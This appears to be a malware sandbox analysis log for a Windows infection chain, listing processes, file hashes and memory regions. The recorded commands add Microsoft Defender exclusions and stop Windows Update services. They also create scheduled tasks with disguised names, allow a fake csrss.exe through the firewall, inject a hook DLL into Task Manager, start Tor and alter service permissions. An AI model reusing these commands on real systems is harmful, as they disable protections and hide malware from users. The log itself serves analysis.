C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7oq96hr.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7oq96hr.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ni514kd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ni514kd.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9wH6se2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9wH6se2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7996 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4BC9.exe

C:\Users\Admin\AppData\Local\Temp\4BC9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3596 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7E06.exe

C:\Users\Admin\AppData\Local\Temp\7E06.exe

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\F5C8.exe

C:\Users\Admin\AppData\Local\Temp\F5C8.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\4B6B.exe

C:\Users\Admin\AppData\Local\Temp\4B6B.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\507D.exe

C:\Users\Admin\AppData\Local\Temp\507D.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\5281.exe

C:\Users\Admin\AppData\Local\Temp\5281.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4028 -ip 4028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 784

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

Network


Files

SHA512 14bb7ea827fcb9c4906e69aef8b0411b00f0a2390045a527d93a0e8c58eec1c9cc2c42f6a005e37a323bb6d344df5e0e36cbde4b87927f17942f6f577634ff27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dded92ec95cf9f22410bdeac841a00d
SHA1 83c32c23d53c59d654868f0b2a5c6be0a46249c2
SHA256 1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e
SHA512 e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Pv8082.exe

MD5 3e39720bda10dbb894b99a4aef9d57a4
SHA1 4f0044c9d40096f13714dd47ef4d5a41132a88ce
SHA256 91e9fea87e0dcd09477cca6655fc7c0e9c69dcd78db17ce71978baac81c11114
SHA512 fb5d9f7796a185d40fb842531e30eceb4d7ef7ee9ccd538fd33e86249dff80d9441ad73631cf62ab27e6dccc95eff9caa8dcc0885519ccfa0631582e3a88cf7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6d1b4edacdce302176de7958a6368df3
SHA1 649ed07d268e4d62d0cb2d2966653522865845de
SHA256 fd46a062dceb124fc5b6c11e6eb2b99e4ceda5e7ac081c90ed0485d796161652
SHA512 0982cadf67e3d8fdc13e09968abc15c7209605ca98ce9a1f5d8935efa5bb5744c118588122114d5235b335c0fbfa825146977d2ffc6785f5571f0010b03a366a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 15aeaa85f499ccf15a065d86ee9eaca3
SHA1 e3d46f809d8a25b5e2db68bc30111205ac5cd351
SHA256 536cf8aadbb6afb9c69a2beb8654dcfc42f8d46462289355e5c13bffc4d92e09
SHA512 838d98997a23ca87e8027db1a270516f5275c082d3b02d32c6ab28f7476d54042ffc98296651d178e86d19526ca9c91cd5eec177f94f88e223d4cc09d0d04a00

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Pv8082.exe

MD5 3e39720bda10dbb894b99a4aef9d57a4
SHA1 4f0044c9d40096f13714dd47ef4d5a41132a88ce
SHA256 91e9fea87e0dcd09477cca6655fc7c0e9c69dcd78db17ce71978baac81c11114
SHA512 fb5d9f7796a185d40fb842531e30eceb4d7ef7ee9ccd538fd33e86249dff80d9441ad73631cf62ab27e6dccc95eff9caa8dcc0885519ccfa0631582e3a88cf7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\1b6df9a3-873e-4991-bf8b-403050be174f.tmp

MD5 c0d482876d0da3ab01aec5a269bef287
SHA1 5c56b1e98fcc92586234fff32306ab8bad0cc36a
SHA256 890f2e59c27c039a9283f12765b0145e38aa3c9191a6edce248ecb1de5d8bb47
SHA512 14bb7ea827fcb9c4906e69aef8b0411b00f0a2390045a527d93a0e8c58eec1c9cc2c42f6a005e37a323bb6d344df5e0e36cbde4b87927f17942f6f577634ff27

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 15aeaa85f499ccf15a065d86ee9eaca3
SHA1 e3d46f809d8a25b5e2db68bc30111205ac5cd351
SHA256 536cf8aadbb6afb9c69a2beb8654dcfc42f8d46462289355e5c13bffc4d92e09
SHA512 838d98997a23ca87e8027db1a270516f5275c082d3b02d32c6ab28f7476d54042ffc98296651d178e86d19526ca9c91cd5eec177f94f88e223d4cc09d0d04a00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6dded92ec95cf9f22410bdeac841a00d
SHA1 83c32c23d53c59d654868f0b2a5c6be0a46249c2
SHA256 1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e
SHA512 e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

memory/6276-234-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7oq96hr.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7oq96hr.exe

MD5 b938034561ab089d7047093d46deea8f
SHA1 d778c32cc46be09b107fa47cf3505ba5b748853d
SHA256 260784b1afd8b819cb6ccb91f01090942375e527abdc060dd835992d88c04161
SHA512 4909585c112fba3575e07428679fd7add07453e11169f33922faca2012d8e8fa6dfb763d991c68d3b4bbc6e78b6f37d2380c502daada325d73c7fff6c647769b

memory/6276-240-0x0000000000400000-0x0000000000433000-memory.dmp

memory/376-241-0x0000000000400000-0x000000000040B000-memory.dmp

memory/6276-236-0x0000000000400000-0x0000000000433000-memory.dmp

memory/6276-235-0x0000000000400000-0x0000000000433000-memory.dmp

\??\pipe\LOCAL\crashpad_1264_BCVXZVTIPQEFGOZX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 de19aeb61276eb1ec546e77fb228b898
SHA1 fba7c92492b1c6565ccb8dc588ad0622a1c703c4
SHA256 ddec54f39bbd6c41c9d555b487028735d952c508ffc3e0ad65d23e9ec9f64be4
SHA512 b419509f950a003a75f101e55e263d4662937ce07fe189c5d4f2f00de22aebc41a11ed81f3494fd040477f86f8ef41ba3271572167d4f5305026a799270600f9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4a027eaa187a4b2c81f5a026dddb02e7
SHA1 0f564d92787adc85bbde7537e793c4a27a19c0ee
SHA256 99773d3a1b7d1869eb31a0caa11d1b1c4132f1108446f10681bdb793245e086d
SHA512 d69d60680c23d1983dd121a92909b1a7becbf160e61121afc475862c6fec0279f4fecdf78763cb94bf4f12637e8ecec535bb7131e4ad87c54977f25e9fa838b4

memory/376-419-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3188-417-0x0000000002D20000-0x0000000002D36000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

MD5 923a543cc619ea568f91b723d9fb1ef0
SHA1 6f4ade25559645c741d7327c6e16521e43d7e1f9
SHA256 bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd
SHA512 a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 7d75a9eb3b38b5dd04b8a7ce4f1b87cc
SHA1 68f598c84936c9720c5ffd6685294f5c94000dff
SHA256 6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7
SHA512 cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9e228d1ff7938ea528c24d07df22699e
SHA1 7971763c6c22deceb424ecdab806c92e87eb0a81
SHA256 f2c6ee8e368ca16eb4982208ac15a456b81aa773945fbb9b2f86843f8b509d3c
SHA512 077d01f5ed851ba02e8c36442a0291f477ae2090c0a06ea1a5d4075ac75cc7fd4f17916ebdfff04fe38b603c018622896e461b83e1fa89de1ed2e0c7a397383b

memory/2264-440-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2264-457-0x0000000074000000-0x00000000747B0000-memory.dmp

memory/2264-458-0x00000000076D0000-0x0000000007C74000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 e05436aebb117e9919978ca32bbcefd9
SHA1 97b2af055317952ce42308ea69b82301320eb962
SHA256 cc9bd0953e70356e31a957ad9a9b1926f5e2a9f6a297cdef303ac693a2a86b7f
SHA512 11328e9514ffaa3c1eab84fae06595d75c8503bd5601adfd806182d46065752885a871b738439b356d1bb2c1ac71fc81e9d46bd2d0daa1b2ba0f40543bf952b9

memory/2264-465-0x00000000071C0000-0x0000000007252000-memory.dmp

memory/2264-467-0x0000000007170000-0x0000000007180000-memory.dmp

memory/2264-468-0x00000000073C0000-0x00000000073CA000-memory.dmp

memory/2264-469-0x00000000082A0000-0x00000000088B8000-memory.dmp

memory/2264-470-0x0000000007560000-0x000000000766A000-memory.dmp

